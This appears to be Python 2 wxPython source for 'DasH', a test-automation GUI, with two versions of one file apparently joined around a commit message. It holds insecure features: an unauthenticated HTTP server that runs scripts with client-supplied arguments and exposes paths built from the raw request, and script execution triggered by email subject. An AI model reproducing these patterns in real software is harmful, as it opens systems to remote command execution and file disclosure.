item3 = wx.MenuItem(menu, wx.NewId(), "Refresh")
#acc = wx.AcceleratorEntry()
#acc.Set(wx.ACCEL_NORMAL, ord('O'), self.popupID1)
#item.SetAccel(acc)
menu.AppendItem(item1)
menu.AppendItem(item2)
menu.AppendItem(item3)
self.Bind(wx.EVT_MENU, self.on_run_script,item1)
self.Bind(wx.EVT_MENU, self.on_kill_script,item2)
self.Bind(wx.EVT_MENU, self.on_refresh_case_page,item3)
self.PopupMenu(menu,event.GetPosition())
def on_kill_script(self,event):
hit_item = self.case_suite_page.GetSelection()
item_name = self.case_suite_page.GetItemText(hit_item)
item_data = self.case_suite_page.GetItemData(hit_item).Data
if item_data.has_key('PROCESS'):
p = item_data['PROCESS']
name= item_data['FULL_NAME']
info('script:{}, returncode:{}'.format(name,p.returncode))
if p.returncode is None:
#if p.is_alive():
info('Terminate alive process {}:{}'.format(item_name, p.pid))
result ='KILL'
self.update_case_status(p.pid, result)
self.mail_test_report("DASH TEST REPORT-updating")
p.terminate()
else:
result ='FAIL' if p.returncode else 'PASS'
info('{}:{} completed with returncode {}'.format(item_name, p.pid, result))
self.update_case_status(p.pid, result)
def run_script(self, script_name):
old_script_name = script_name
lex = shlex.shlex(script_name)
lex.quotes = '"'
lex.whitespace_split = True
script_name_and_args = list(lex)
script_args = script_name_and_args[1:]
script_name = script_name_and_args[0]
if script_name.find(os.path.sep)!=-1:
pass
else:
script_name= '{}/{}'.format(self.suite_path,script_name)
from lib.common import create_case_folder
old_sys_argv = sys.argv
sys.argv= [script_name]+script_args
case_log_path = create_case_folder(self.log_path )#self.log_path #create_case_folder()
sys.argv= old_sys_argv
try:
if os.path.exists('script_runner.exe'):
execute = 'script_runner.exe'
cmd = [execute,script_name ]+script_args + ['-l','{}'.format(case_log_path)]
#p=subprocess.Popen(cmd, creationflags = subprocess.CREATE_NEW_CONSOLE)
else:
cmd = [sys.executable,'./script_runner.py', script_name ]+script_args+ ['-l','{}'.format(case_log_path)]
p=subprocess.Popen(cmd, creationflags = subprocess.CREATE_NEW_CONSOLE)#, stdin=pipe_input, stdout=pipe_output,stderr=pipe_output)
self.add_new_case_to_report(p.pid, old_script_name, p, case_log_path)
except:
error(traceback.format_exc())
return p, case_log_path
def on_run_script(self,event):
hit_item = self.case_suite_page.GetSelection()
item_name = self.case_suite_page.GetItemText(hit_item)
item_data = self.case_suite_page.GetItemData(hit_item).Data
script_name = self.case_suite_page.GetItemData(hit_item).Data['path_name']
if script_name.lower().split('.')[-1] in ['txt','csv']:#test suite file, not a single script
self.run_a_test_suite(script_name)
else:#a single test case
self.on_kill_script(event)
try:
p, case_log_path = self.run_script('{} {}'.format(script_name, item_name.replace(os.path.basename(script_name), '')))
self.case_suite_page.GetItemData(hit_item).Data['PROCESS']=p
self.case_suite_page.GetItemData(hit_item).Data['FULL_NAME']= item_name
info('start process {} :{}'.format(item_name, p.pid))
#p.join() # this blocks until the process terminates
time.sleep(1)
except Exception as e :
error(traceback.format_exc())
#p = Process(target=run_script, args=[script_name, script_and_args])
#p.start()
def check_case_status(self):
self.check_case_running_status_lock.acquire()
changed=False
running_case = 0
for pid in self.dict_test_report.keys():
case_name, start_time, end_time, duration, return_code ,proc, log_path= self.dict_test_report[pid]
if return_code is None:
if proc.poll() is None:
running_case+=1
debug('RUNNING', start_time, end_time, duration, return_code ,proc, log_path)
else:
changed=True
return_code = 'FAIL' if proc.returncode else 'PASS'
self.update_case_status(pid,return_code)
if running_case:
pass
elif not self.case_queue.empty():#self.case_queue.qsize():
case_name_with_args = self.case_queue.get()
p, case_log_path = self.run_script(case_name_with_args)
self.check_case_running_status_lock.release()
if changed:
#test_report = self.generate_report(filename='{}/dash_report.txt'.format(self.log_path))
self.mail_test_report('DasH Test Report-updating')
return changed
def polling_running_cases(self):
try:
while self.alive:
time.sleep(10)
try:
self.check_case_status()
except:
if self.alive:
error(traceback.format_exc())
except:
pass
print('end polling_running_cases')
time.sleep(0.01)
#sys.exit(0) #break can't exit the app immediately, so change it to exit
#self.check_case_running_status_lock.acquire()
#self.check_case_running_status_lock.release()
def add_new_case_to_report(self, pid, case_name, proc, log_path):
start_time=datetime.now()
duration = 0
end_time = None
return_code = None
#self.check_case_running_status_lock.acquire()
if pid in self.dict_test_report:
self.dict_test_report[pid].update([case_name, start_time, end_time, duration, return_code, proc, log_path])
else:
self.dict_test_report[pid]= [case_name, start_time, end_time, duration, return_code, proc, log_path ]
#self.check_case_running_status_lock.release()
def update_case_status(self, pid,return_code=None):
now = datetime.now()
case_name, start_time, end_time, duration, tmp_return_code ,proc,log_path= self.dict_test_report[pid]
if tmp_return_code is None:
duration = (now-start_time).total_seconds()
if return_code is not None:
end_time=now
self.dict_test_report[pid]=[case_name,start_time, end_time, duration, return_code, proc, log_path]
else:
pass# don't update one case result twice
def mail_test_report(self, subject="DASH TEST REPORT-updating"):
try:
#self.check_case_status()
report_all_cases=True
if subject.find('updating')!=-1:
report_all_cases=False
test_report = self.generate_report(filename='{}/dash_report_{}.html'.format(self.log_path, self.timestamp),report_all_cases= report_all_cases)
#TO, SUBJECT, TEXT, SERVER, FROM
send_mail_smtp_without_login(self.mail_to_list, subject,test_report,self.mail_server,self.mail_from)
except Exception as e:
error(traceback.format_exc())
def on_mail_test_report(self,event):
self.mail_test_report('DasH Test Report-requested')
#p.terminate()
def on_handle_request_via_mail(self):
import imaplib
from email.parser import Parser
def process_multipart_message(message):
if isinstance(message, basestring) or isinstance(message , list):
return message
rtn = ''
try:
if message.is_multipart():
for m in message.get_payload():
rtn += process_multipart_message(m)
else:
rtn += message.get_payload()
except Exception as e:
pass
return rtn
url, user, password = self.mail_read_url,self.mail_user, self.mail_password
if self.mail_user in ['nonexistent@dash.com']:
return
conn = imaplib.IMAP4_SSL(url,993)
#conn.logout()
#conn.authenticate('')
conn.debug = 0#10
def plain_callback(response):
return "{}\x00{}\x00{}".format(user.lower(),user.lower(),password)
try:
conn.authenticate('PLAIN',plain_callback)
except:
conn.login(user,password)
self.mail_failure = False
conn.select('INBOX')#, readonly=True)
try:
authorized_mail_address = self.mail_to_list.replace(',',';').split(';')
except Exception as e:
return
for mail_address in authorized_mail_address:
results,data = conn.search(None,'(UNSEEN)', '(FROM "{}")'.format(mail_address)) # #'ALL')
msg_ids = data[0]
msg_id_list = msg_ids.split()
MAX_UNREAD_MAIL = 50
for unread_mail_id in msg_id_list[::-1][:MAX_UNREAD_MAIL]:
result,data = conn.fetch(unread_mail_id,'(BODY.PEEK[HEADER])')#"(RFC822)")#
raw_email = data[0][1]
p = Parser()
msg = p.parsestr(raw_email)
#msg = process_multipart_message(msg )
from1 = msg.get('From')
sub = '{}'.format(msg.get('Subject'))
sub = sub.strip().lower()
support_list='''
###############################
mail subject below is supported:
dash-request-case-queue : request the cases in queue which to be executed
dash-request-case : request cases which are under suite_path
dash-request-report : request a test report by now
dash-request-kill-running : to kill all running test cases
dash-request-clear-queue : to clear/remove all cases which are in case queue
dash-request-run : to run script(s), each line is a script with arguments if it has
--------------------------------
***non-case-sensitive***
###############################
'''
handled =False
if sub in ['dash']:
send_mail_smtp_without_login(self.mail_to_list, 'DONE-DasH Support List',support_list,self.mail_server,self.mail_from)
handled = True
#conn.uid('STORE', unread_mail_id, '+FLAGS', '\SEEN')
elif sub in ['dash-request-case-queue']:
case_in_queue =self.get_case_queue(None)
send_mail_smtp_without_login(self.mail_to_list, 'DONE-DasH:Case In Queue',case_in_queue+support_list,self.mail_server,self.mail_from)
#conn.uid('STORE', unread_mail_id, '+FLAGS', '\SEEN')
handled = True
elif sub in ['dash-request-case']:
cases_string = '\n\t'.join(self.case_list)
send_mail_smtp_without_login(self.mail_to_list, 'DONE-DasH:Case List',cases_string+support_list,self.mail_server,self.mail_from)
handled = True
#conn.uid('STORE', unread_mail_id, '+FLAGS', '\SEEN')
elif sub in ['dash-request-report']:
self.mail_test_report('DasH Test Report-requested')
#conn.uid('STORE', unread_mail_id, '+FLAGS', '\SEEN')
handled = True
elif sub in ['dash-request-kill-running']:
killed= self.on_kill_running_case()
send_mail_smtp_without_login(self.mail_to_list, 'DONE-[DasH]:Killed Running Case(s)',killed+support_list,self.mail_server,self.mail_from)
handled = True
#conn.uid('STORE', unread_mail_id, '+FLAGS', '\SEEN')
elif sub in ['dash-request-clear-queue']:
case_in_queue = self.on_clear_case_queue()
send_mail_smtp_without_login(self.mail_to_list, 'DONE-DasH:Clear Case Queue',case_in_queue+support_list,self.mail_server,self.mail_from)
handled = True
#conn.uid('STORE', unread_mail_id, '+FLAGS', '\SEEN')
elif sub in ['dash-request-run']:
#if from1 in [ 'yu_silence@163.com',self.mail_to_list]:
conn.uid('STORE', unread_mail_id, '+FLAGS', r'(\SEEN)')
handled = True
#conn.uid('STORE', '-FLAGS', '(\Seen)')
payload = msg.get_payload()
payload = process_multipart_message(payload )
from lib.html2text import html2text
txt = html2text(payload)
cases = txt.replace('\r\n','\n').split('\n')
for line in cases:
line = line.strip()
if line.strip().startswith('#') or len(line)==0:
pass
else:
#done: replace lines below with a function
self.add_line_to_case_queue(line)
result,data = conn.fetch(unread_mail_id,'(RFC822)')#"(RFC822)")#
else:
conn.uid('STORE', unread_mail_id, '-FLAGS', r"(\SEEN)")
#fixed : 2017-09-25 failed to set unmatched mail to unread, to fetch it again with RFC822
if handled:
result,data = conn.fetch(unread_mail_id,'(RFC822)')#"(RFC822)")#
def check_case_type(self, str_line):
lex = shlex.shlex(str_line)
lex.quotes = '"'
lex.whitespace_split = True
script_name_and_args = list(lex)
script_name = script_name_and_args[0]
return script_name.lower().split('.')[-1],script_name_and_args[0] ,script_name_and_args[1:]
def polling_request_via_mail(self):
try:
while self.alive:
time.sleep(5)
try:
self.on_handle_request_via_mail()
self.mail_failure =False
except Exception as e:
self.mail_failure =True
except :
pass
print('end polling_request_via_mail!!!')
time.sleep(0.01)
def get_case_queue(self, item=None):
case_in_queue = list(self.case_queue.queue)
number_in_queue= len(case_in_queue)
if number_in_queue:
str_case_in_queue='\ntotal {} case(s) in Queue\n'.format(number_in_queue)+'\n'.join('{}'.format(x) for x in case_in_queue)
else:
str_case_in_queue='\nNo Case in Queue'
info('Case(s) in Queue', str_case_in_queue)
return str_case_in_queue
def on_clear_case_queue(self, event=None):
case_in_queue = self.get_case_queue(None)
self.case_queue.queue.clear()
self.get_case_queue(None)
return case_in_queue
def on_kill_running_case(self,event=None):
killed_case= ''
for case in self.dict_test_report:
case_name,start_time, end_time, duration, return_code, proc, log_path = self.dict_test_report[:7]
if return_code is None:
if proc.poll() is None:
killed_case+='{}:{}\n'.format(case_name, proc.pid)
info('Terminate alive process {}:{}'.format(case_name, proc.pid))
result ='KILL'
self.update_case_status(proc.pid, result)
proc.terminate()
info('Killed All Running cases', killed_case)
return killed_case
def run_a_test_suite(self, csv_file_name, clear_queue=False, kill_running =False):
try:
case_type, suite_file_name, args =self.check_case_type(csv_file_name)
if clear_queue:
self.on_clear_case_queue()
if kill_running:
self.on_kill_running_case()
import csv
if suite_file_name.find(os.path.sep)!=-1:
pass
else:
suite_file_name= '{}/{}'.format(self.suite_path,suite_file_name)
with open(suite_file_name) as bench:
reader = csv.reader(bench,delimiter=',')
for row in reader:
if len(row)<1:
continue
else:
name = row[0]
args.insert(0,0)
for index in range(1,len(args)):
name =name.replace('{{index}}'.format(index =index), '{}'.format(args[index]))
self.case_queue.put(name)
info('adding case to queue: {}'.format(name))
except Exception as e:
error(traceback.format_exc())
def web_server_start(self):
from SocketServer import ThreadingMixIn
from BaseHTTPServer import HTTPServer,BaseHTTPRequestHandler
import cgi , urllib#StringIO
class HttpHandler(BaseHTTPRequestHandler):
runner_proc =self.add_line_to_case_queue
root = os.path.dirname(__file__)+ '/html/'
home = root
suite_path = self.suite_path
log_path = self.log_path
session_path = self.session_path
def __del__(self):
#self.hdrlog.close()
#print('end http server')
pass
def list_dir(self, path, related_path, pattern=['']):
"""Helper to produce a directory listing (absent index.html).
Return value is either a file object, or None (indicating an
error). In either case, the headers are sent, making the
interface the same as for send_head().
"""
content =""
try:
list = os.listdir(path)
except os.error:
self.send_error(404, "No permission to list directory")
return ""
list.sort(key=lambda a: a.lower())
#f = StringIO()
displaypath = cgi.escape(urllib.unquote(self.path))
content='<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">'
content+="<html>\n<title>Directory listing for %s</title>\n" % displaypath
content+="<body>\n<h2>Directory listing for %s</h2>\n" % displaypath
content+="<hr>\n<ul>\n"
content+='''
<SCRIPT>
function post( id, script, dest )
{
element = document.getElementById(id);
value = element.value
params = 'script='+encodeURI(script)+'&arg='+encodeURI(value)
var xmlhttp;
if (window.XMLHttpRequest)
{// code for IE7+, Firefox, Chrome, Opera, Safari
xmlhttp=new XMLHttpRequest();
}
else
{// code for IE6, IE5
xmlhttp=new ActiveXObject('Microsoft.XMLHTTP');
}
xmlhttp.onreadystatechange=function()
{
if (xmlhttp.readyState==4 && xmlhttp.status==200)
{
alert(xmlhttp.responseText);
newHTML( xmlhttp.responseText);
setTimeout("window.close()",3000);
}
}
xmlhttp.open("POST",dest,true);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send( params );
}
function newHTML(HTMLstring) {
//var checkitem = mygetCheckedItem();
//HTMLstring=post( 'manualtest','/cgi-bin/onSUTLIST.py', 'bedname='+encodeURI(checkitem) );
var newwindow=window.open();
var newdocument=newwindow.document;
newdocument.write(HTMLstring);
newdocument.close();
}
</SCRIPT>
<table>
'''
for name in list:
extension = os.path.basename(name).split('.')[-1]
if pattern in ['', '*', '*.*']:
pass
elif extension in pattern:
pass
else:
continue
fullname = os.path.join(path, name)
displayname = linkname = name
# Append / for directories or @ for symbolic links
if os.path.isdir(fullname):
displayname = name + "/"
linkname = name + "/"
if os.path.islink(fullname):
displayname = name + "@"
# Note: a link to a directory displays with @ and links with /
input_button =""
filename = urllib.quote(linkname)
if not related_path.endswith('/'):
related_path+='/'
fullfilename =related_path+urllib.quote(linkname)
if related_path.startswith('/case') and os.path.isfile(fullname):
input_button = """
<input id=%s name="ARGS" style="width:200" type="text" value="" rows="1" autocomplete="on">
<input name="go" value="Run" type="button" onClick="post('%s','%s', 'RunCase')";>"""%(filename,filename,fullfilename)
elif related_path.startswith('/suite') and os.path.isfile(fullname):
input_button = """
<input id=%s name="ARGS" style="width:200" type="text" value="" rows="1" autocomplete="on">
<input name="go" value="Run" type="button" onClick="post('%s','%s', 'RunSuite')";>
</td></tr>\n"""%(filename,filename,fullfilename)
content+='<tr><td><a href="%s">%s</a></td><td>'% (related_path+urllib.quote(linkname), cgi.escape(displayname))+input_button
content+="</table></ul>\n<hr>\n</body>\n</html>\n"
return content
def array2htmltable(self,Array):
content = "<table border='1' align='left' width=autofit >"
for index , sublist in enumerate( Array):
content += ' <tr><td>\n%d</td><td>'%(index+1)
content += ' </td><td>'.join([x if x!='' else ' ' for x in sublist ])
content += ' \n</td></tr>\n'
content += ' \n </table><br>'
return content
def show_content_by_path(self, path, type='csv'):
header = '''
<table border="0" align='center' width="100%" >
<tr> <td align=center valign=middle><a href="/">Back to DasH</a></td> </tr>
</table>'''
footer = header
if os.path.isfile(path):
indexpage= open(path)
encoded=indexpage.read()
html = []
for line in encoded.split('\n'):
html.append('<p>%s</p>'%line.replace('\r', '').replace('\n',''))
encoded= ''.join(html)
if type in ['csv']:
ar =[]
for line in html:
row = line.split(',')
ar.append(row)
encoded = self.array2htmltable(ar)
# elif type in ['py']:
# ar =[]
# for line in html:
# row = line.split(',')
# ar.append(row)
# encoded = self.array2htmltable(ar)
else:
encoded =self.list_dir(path, self.path, type)
#encoded = "<html>{}</html>".format(cgi.escape(encoded))
encoded =header+encoded.replace('\t', ' ').replace(' ', ' ') + footer
return encoded
def do_GET(self):
root = self.root
home = self.home
suite_path = self.suite_path
log_path = self.log_path
response = 200
type = 'text/html'
if self.path=='/':
indexpage= open(home+ 'index.html', 'r')
encoded=indexpage.read()
encoded = encoded.encode(encoding='utf_8')
elif self.path =='/favicon.ico':
indexpage= open(home+'dash.bmp', 'r')
encoded=indexpage.read()
type = "application/x-ico"
elif self.path=='/home':
path = os.path.abspath(self.suite_path)
encoded =self.list_dir(path, './')
elif self.path.startswith('/sessions'):
path = os.path.abspath(self.session_path)
path = path+ self.path[9:]#replace('/log/','/')
encoded = self.show_content_by_path(path)
elif self.path.startswith('/case'):
path = os.path.abspath(self.suite_path)
path = path+ self.path[5:]#replace('/log/','/')
encoded = self.show_content_by_path(path, 'py')
elif self.path.startswith('/suite'):
path = os.path.abspath(self.suite_path)
path = path+ self.path[6:]#replace('/log/','/')
encoded = self.show_content_by_path(path, 'csv')
elif self.path.startswith('/log'):
path = os.path.abspath(self.log_path)
print(path)
path = path+ self.path[4:]#replace('/log/','/')
encoded = self.show_content_by_path(path, '*')
else:
path = os.path.abspath(root)
path = path+ self.path.replace('//','/')
if os.path.isfile(path):
from lib.common import csvfile2array
arrary = csvfile2array(path)
encoded = self.array2htmltable(arrary)
else:
encoded =self.list_dir(path, self.path)
self.send_response(200)
self.send_header("Content-type", type)
self.end_headers()
self.wfile.write(encoded)
def LoadHTMLPage(self, filename, replace=[], Pattern4ESCAPE1='#NOTEXISTPATTERN_HERE_FOR_STRING_FORMAT1#',Pattern4ESCAPE2='#NOTEXISTPATTERN_HERE_FOR_STRING_FORMAT2#'):
indexpage= open(filename, 'r')
encoded=indexpage.read()
encoded =encoded.replace('%s',Pattern4ESCAPE1 )
encoded =encoded.replace('%',Pattern4ESCAPE2 )
encoded =encoded.replace(Pattern4ESCAPE1,'%s' )
for item in replace:
encoded =encoded.replace('%s', item, 1)
encoded =encoded.replace(Pattern4ESCAPE2, '%' )
return encoded
def RunScript(self, script, args=None):
if not args:
args =''
exe_cmd = '%s %s'%(script,args)
print('Run Script:'+exe_cmd)
encoded = self.runner_proc(exe_cmd)
#encoded ='run{}'.format(exe_cmd)
self.send_response(200)
self.send_header("Content-type", "text/html")#; charset=%s" % enc)
self.end_headers()
self.wfile.write(encoded)
def ParseFormData(self, s):
import re
reP = re.compile('^(-+[\d\w]+)\r\n(.+)-+[\d\w]+-*', re.M|re.DOTALL)
#s = '''-----------------------------186134213815046583202125303385\r\nContent-Disposition: form-data; name="fileToUpload"; filename="case1.csv"\r\nContent-Type: text/csv\r\n\r\n,ACTION,EXPECT,TIMEOUT,CASE OR COMMENTS\n[case1],,,,\n#var,\ncmd,${5}\ncmd2,${cmd2}\n#setup,,,,\ntel,pwd,],10\ntel,ls,],10,\n,ls,],10,\ntel,${cmd},],10,\n,${cmd2},],10,\n#!---,,,,\n\n\r\n-----------------------------186134213815046583202125303385--\r\n'''
#rs = re.escape(s)
rs =s
m = re.match(reP, rs)
print(rs)
if m:
print('match!')
boundary = m.group(1)
print(m.group(2))
c = m.group(2)
index =c.find(boundary)
if index ==-1:
pass
else:
c = c[:index]
l = c.split('\r\n')
print(l)
attribute=l[0].split('; ')
da={}
la =attribute[0].split(':')
da.update({la[0]:la[1]})
for a in attribute[1:]:
la=a.split('=')
da.update({la[0]:la[1].replace('"','').replace('\'','')})
data = '\r\n'.join(l[3:-1])
filename = da['filename']
if filename.find('\\')!=-1:
filename=filename[filename.rfind('\\')+1:]
else:
filename=filename[filename.rfind('/')+1:]
return (da['name'],filename,data)
else:
print('not match')
return None
def do_POST(self):
content_len = int(self.headers['Content-Length'])
#self.queryString
self.path
s = self.rfile.read(content_len)
encoded=''
try:
s=str(s)
import urlparse
req = urlparse.parse_qs(urlparse.unquote(s))
script = '{}/{}'.format(self.suite_path, req['script'][0][7:])
if req.has_key('arg'):
arg= req['arg'][0]
else:
arg = ''
executefile =''
cmd_line = script+ ' '+ arg
encoded=self.runner_proc(cmd_line)
#print(encoded)
encoded = encoded.encode(encoding='utf_8').replace('\t', ' ').replace('\n','')
self.send_response(200)
self.send_header("Content-type", "text/html")#; charset=%s" % enc)
self.end_headers()
self.wfile.write(encoded)
except Exception as e:
import traceback
print(traceback.format_exc())
response = self.ParseFormData(s)
if response:
type, filename, data =response
encoded = self.onUploadFile(type, filename, data)
else:
encoded ='ERROR: %s, Can\'t parse Form data: %s'%(str(e),s)
encoded= encoded.encode(encoding='utf_8')
try:
requestline = self.requestline
import re
reScript=re.compile('POST\s+(.+)\s+HTTP.*', re.DOTALL)
m= re.match(reScript, requestline)
if m:
returncode =self.RunScript(m.group(1),[])
encoded ='script %s completed with return code %d!'%(m.group(1), returncode)
except Exception as e:
encoded ='can\'t run script!'
encoded = encoded.encode(encoding='utf_8', errors='strict')
# self.send_response(200)
# self.send_header("Content-type", "text/html")#; charset=%s" % enc)
# self.end_headers()
# self.wfile.write(encoded)
port =self.web_port
home = __file__ #sys.argv[0]
if os.path.exists(home):
home = os.path.dirname(home)
root = home
home = home +'/html/'
#done move runWebserver to DasH, and launch it at dash initialization
class ThreadingHttpServer(ThreadingMixIn, HTTPServer):
pass
httpd=ThreadingHttpServer(('',port), HttpHandler)
from socket import socket, AF_INET, SOCK_DGRAM, gethostname,SOL_SOCKET, SO_REUSEADDR, getfqdn#*
try:
hostip=''
s = socket(AF_INET, SOCK_DGRAM)
s.bind(("", 1234))
#sq = socket(AF_INET, SOCK_DGRAM)
s.connect(("10.0.0.4", 1234))
domain = getfqdn()
hostip = s.getsockname()[0]
self.web_host = hostip
self.SetTitle('DasH-{}:{}'.format(self.web_host, self.web_port))
s.close()
except Exception as e:
import traceback
msg = traceback.format_exc()
print(msg)
hostname =gethostname()
info("Server started on %s (%s),port %d....."%(hostname,hostip,port))
#print('Process ID:%d'%os.geteuid())
self.web_daemon= httpd
on=1
self.web_daemon.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, on)
httpd.serve_forever()
try:
s.close()
except:
pass
def add_line_to_case_queue(self,line):
type_case, case_name, args = self.check_case_type(line)
if type_case in ['txt','csv']:
self.run_a_test_suite(line)
else:
self.case_queue.put(line)
return info('adding case to queue: {}'.format(line))
def OnMouseMotion(self, evt):
try:
active_page = self.navigator.GetCurrentPage()
pos = self.case_suite_page.ScreenToClient(wx.GetMousePosition())
item_index, flag = active_page.HitTest(pos)
item_data = active_page.GetItemData(item_index)
tip = active_page.GetToolTip()
if item_data :
if item_data.Data.has_key('tip'):
active_page.SetToolTipString(item_data.Data['tip'])
else:
from pprint import pformat
tip_string = pformat(item_data.Data)
active_page.SetToolTipString(tip_string)
if False:
if flag == wx.LIST_HITTEST_ONITEMLABEL:
active_page.SetToolTipString('Some information about ' + self.case_suite_page.GetItemText(item_index))
else:
active_page.SetToolTipString('')
except Exception as e:
pass
evt.Skip()
def on_keyboard_key_down(self,event):
event.Skip()
@gui_event_decorator.gui_even_handle
def on_generate_code(self, event):
self.generate_code('{}/test_code_{}.py'.format(self.suite_path, datetime.now().isoformat().replace(':','-').replace('.','-')))
def on_right_up_over_tab_in_edit_area(self, event):
x = event.GetEventObject()
tabID = x.GetId()
tab = x.FindWindowById(tabID)
#session.session.open(retry, interval)
#tab.open(3,15)
th =threading.Thread(target=self.edit_area.GetCurrentPage().open, args=[1, 5])
#index = self.edit_area.GetCurrentPage().open(1, 60)
th.start()
event.Skip()
#self.edit_area.SetSelection(index)
def idle_process(self):
try:
self.on_handle_request_via_mail()
self.mail_failure =False
except Exception as e:
self.mail_failure =True
try:
self.check_case_status()
except:
pass
#print('{} i\'m idle !!!!!!!!!!!!!!!!!!'.format(datetime.now().isoformat()))
def on_idle(self,event):
now = datetime.now()
max_idle=3
if (now-self.last_time_call_on_idle).total_seconds()>max_idle:
self.last_time_call_on_idle=now
th=threading.Thread(target=self.idle_process, args=[])
th.start()
threading.Thread(target=self.check_whether_function_file_is_updated, args=[]).start()
@gui_event_decorator.gui_even_handle
def on_generate_test_report(self,event):
file_name='{}/dash_report_{}.html'.format(self.log_path, self.timestamp)
report = self.generate_report(filename=file_name)#'{}/dash_report_{}.html'.format(self.log_path, self.timestamp))
report = 'http://{}:{}/log/{}\n{}'.format(self.web_host, self.web_port, file_name.replace(self.log_path, ''),report)
print(report)
@gui_event_decorator.gui_even_handle
def on_leftD_click_url_in_m_log(self, event):
#print(urlString)
mouseEvent = event.GetMouseEvent()
if mouseEvent.LeftDClick():
urlString = self.m_log.GetRange(event.GetURLStart(),event.GetURLEnd())
webbrowser.open(urlString)
event.Skip()
#done: 2017-08-22, 2017-08-19 save main log window to a file
#done: 2017-08-19 add timestamps to log message
#done: 2017-08-22, 2017-08-19 mail to someone
#done: 2017-08-19 run a script in DasH
#done: 2017-08-19 generate test report
#done: 2017-10-7 2017-08-19 publish all test cases in a web page
#done: 2017-10-7 2017-08-19 trigger a test remote via web page
#todo: 2017-08-19 re-run failed cases
#done: 2017-08-19 build executable packege for DasH
#todo: 2017-08-19 a popup window to get email address/password/mail_server...
#done: 2017-08-22 output in m_log window has a lot of empty line, need remove them
#todo: 2017-08-23 in common.call_function_in_module, should end all threads which are started in previous instance
#done: 2017-10-7 2017-08-23 add tips for all tree item in teh left
#done: 2017-10-7 2017-09-30 failed to send command to a session whose name start with numbers e.g. 1_session
# Traceback (most recent call last):
# File "C:/workspace/gDasH\gui\DasHFrame.py", line 588, in on_command_enter
# instance_name, function_name, new_argvs, new_kwargs, str_code = call_function_in_module(module,class_name,function,args, globals())
# File "C:/workspace/gDasH\lib\common.py", line 153, in call_function_in_module
# eval('GetFunArgs({args})'.format(args=args_string))
# File "<string>", line 1
# GetFunArgs(35b)
# ^
# SyntaxError: invalid syntax
#todo: start thread for all gui event handlers with decoration, catch all exceptions
remove debug info--show src function/class instance refcount
#!/usr/bin/python
'''The MIT License (MIT)
Copyright (c) 2017 Yu Xiong Wei(try.dash.now@gmail.com)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.'''
__author__ = 'sean yu (Yu, Xiongwei)'
__doc__ = '''
it's GUI of DasH aka Do as Human
created 2017-05-06 by Sean Yu
'''
import webbrowser
from datetime import datetime
import wx.grid as gridlib
import traceback
import wx
from gui.MainFrame import MainFrame
import os
from lib.common import load_bench, caller_stack_info,info, get_next_in_ring_list,get_folder_item, info,debug, warn, error, parse_command_line, call_function_in_module
import re
import time
import threading
import ConfigParser
import sys
import inspect
import Queue
from SessionTab import SessionTab
import imp
import types
from lib.common import send_mail_smtp_without_login
from lib.common import run_script
from multiprocessing import Process
import subprocess
import shlex
#from dut import dut
DUT={}
class RedirectText(object):
font_point_size = 10
old_stdout = None
old_stderr = None
write_lock = None
log_file = None
error_pattern = None
def __init__(self,aWxTextCtrl, log_path=None):
self.old_stderr , self.old_stdout=sys.stderr , sys.stdout
self.out=aWxTextCtrl
self.font_point_size = self.out.GetFont().PointSize+2
self.write_lock = threading.Lock()
self.error_pattern = re.compile('error|\s+err\s+|fail|wrong|errno')
if log_path:
name = '{}/dash.log'.format(log_path)
self.log_file = open(name, 'w+')
self.fileno = self.log_file.fileno
def write(self,string):
self.write_lock.acquire()
try:
self.old_stdout.write(string)
#string = string.replace('\\033\[[0-9\;]+m', '')
#self.old_stderr.write(string)
err_pattern = self.error_pattern#re.compile('error|\s+err\s+|fail|wrong')
#wx.CallAfter(self.out.SetDefaultStyle,wx.TextAttr(wx.GREEN, wx.BLACK,font =wx.Font(self.font_point, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))
if False:#err_pattern.search(string.lower()):
last_start = 0
for m in err_pattern.finditer(string.lower()):
#print(m.start(), m.end(), m.group())
#wx.CallAfter(self.out.SetDefaultStyle,wx.TextAttr(wx.GREEN, wx.BLACK,font =wx.Font(self.font_point, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))
self.out.SetDefaultStyle(wx.TextAttr(wx.GREEN, wx.BLACK,font =wx.Font(self.font_point_size, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))#wx.CallAfter(
self.out.AppendText( string[last_start:m.start()])
self.out.SetDefaultStyle(wx.TextAttr(wx.RED, wx.YELLOW,font =wx.Font(self.font_point_size, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))#wx.CallAfter(
#wx.CallAfter(self.out.SetDefaultStyle,wx.TextAttr(wx.RED, wx.YELLOW,font =wx.Font(self.font_point+2, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))
self.out.AppendText( string[m.start():m.end()])
last_start= m.end()
#wx.CallAfter(self.out.SetDefaultStyle,wx.TextAttr(wx.GREEN, wx.BLACK,font =wx.Font(self.font_point, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))
self.out.SetDefaultStyle(wx.TextAttr(wx.GREEN, wx.BLACK,font =wx.Font(self.font_point_size, family = wx.DEFAULT, style = wx.NORMAL, weight = wx.NORMAL, faceName = 'Consolas')))#wx.CallAfter(
